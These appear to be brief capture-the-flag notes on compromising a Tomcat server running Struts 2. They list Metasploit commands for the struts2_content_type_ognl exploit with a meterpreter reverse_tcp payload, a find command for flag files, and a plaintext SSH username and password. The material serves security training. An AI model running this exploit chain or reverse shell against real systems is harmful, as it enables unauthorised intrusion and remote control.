Nmap reveals a web service running on port 80/tcp, identified as Apache Tomcat/Coyote JSP engine 1.1. When we connect to the web server, we are redirected to /showcase.action.
Googling for the terms "apache" and "showcase.action" confirms that the server is probably running "Struts 2"
search struts2
use 0 but not worked
use exploit/multi/http/struts2_content_type_ognl
set rhosts
set rport
set lhost
set TARGETURI /showcase.action
set payload linux/x64/meterpreter/reverse_tcp
got meterpreter
to run find command use---> shell
find / 2>/dev/null -i flag [-i ignor case]
/usr/local/tomcat/webapps/ROOT/ThisIsFlag1.txt
ssh -via /home/santa
santa:rudolphrednosedreindeer